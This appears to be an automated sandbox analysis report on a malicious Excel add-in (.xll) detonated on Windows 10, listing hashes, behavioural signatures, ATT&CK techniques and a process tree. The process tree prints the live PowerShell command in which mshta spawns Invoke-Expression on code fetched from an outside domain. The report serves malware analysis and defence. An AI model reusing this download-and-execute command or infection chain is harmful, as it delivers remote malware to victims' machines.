Analysis

  • max time kernel
    145s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 18:07

General

  • Target

    0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll

  • Size

    12KB

  • MD5

    18e176921ed58908b20b7b23037ecd03

  • SHA1

    24e785ac4c6e96954e70451c02aa35d2b474c648

  • SHA256

    0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea

  • SHA512

    d02312253453fba1139f669fc8d8a059a43177ff609d19b34882dbdc656966c40caa1f1fda829525f21153e39ab2cd280114321bd1efe3b30d867da996e72ef5

  • SSDEEP

    192:fL29RBzDzeobchBj8JONUONhru8rEPEjr7Ahv:z29jnbcvYJOBju8vr7Cv

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4156
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2820

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YB09K3UP\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll
    Filesize

    12KB

    MD5

    18e176921ed58908b20b7b23037ecd03

    SHA1

    24e785ac4c6e96954e70451c02aa35d2b474c648

    SHA256

    0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea

    SHA512

    d02312253453fba1139f669fc8d8a059a43177ff609d19b34882dbdc656966c40caa1f1fda829525f21153e39ab2cd280114321bd1efe3b30d867da996e72ef5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0nfbijx.brn.psm1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2820-62-0x0000000008210000-0x000000000888A000-memory.dmp
    Filesize

    6.5MB

  • memory/2820-60-0x00000000069C0000-0x00000000069DE000-memory.dmp
    Filesize

    120KB

  • memory/2820-46-0x0000000005C90000-0x00000000062B8000-memory.dmp
    Filesize

    6.2MB

  • memory/2820-63-0x0000000006EE0000-0x0000000006EFA000-memory.dmp
    Filesize

    104KB

  • memory/2820-61-0x0000000006A00000-0x0000000006A4C000-memory.dmp
    Filesize

    304KB

  • memory/2820-47-0x0000000005B20000-0x0000000005B42000-memory.dmp
    Filesize

    136KB

  • memory/2820-59-0x0000000006410000-0x0000000006764000-memory.dmp
    Filesize

    3.3MB

  • memory/2820-49-0x00000000063A0000-0x0000000006406000-memory.dmp
    Filesize

    408KB

  • memory/2820-45-0x00000000033D0000-0x0000000003406000-memory.dmp
    Filesize

    216KB

  • memory/2820-48-0x0000000006330000-0x0000000006396000-memory.dmp
    Filesize

    408KB

  • memory/3052-15-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-1-0x00007FFCD6C0D000-0x00007FFCD6C0E000-memory.dmp
    Filesize

    4KB

  • memory/3052-17-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-18-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-13-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-12-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-2-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-3-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-11-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-91-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-5-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-14-0x00007FFC94340000-0x00007FFC94350000-memory.dmp
    Filesize

    64KB

  • memory/3052-9-0x00007FFC94340000-0x00007FFC94350000-memory.dmp
    Filesize

    64KB

  • memory/3052-16-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-10-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-7-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-8-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-0-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-6-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-69-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-71-0x00007FFCD6C0D000-0x00007FFCD6C0E000-memory.dmp
    Filesize

    4KB

  • memory/3052-72-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-73-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-89-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-92-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-90-0x00007FFC96BF0000-0x00007FFC96C00000-memory.dmp
    Filesize

    64KB

  • memory/3052-4-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB

  • memory/3052-93-0x00007FFCD6B70000-0x00007FFCD6D65000-memory.dmp
    Filesize

    2.0MB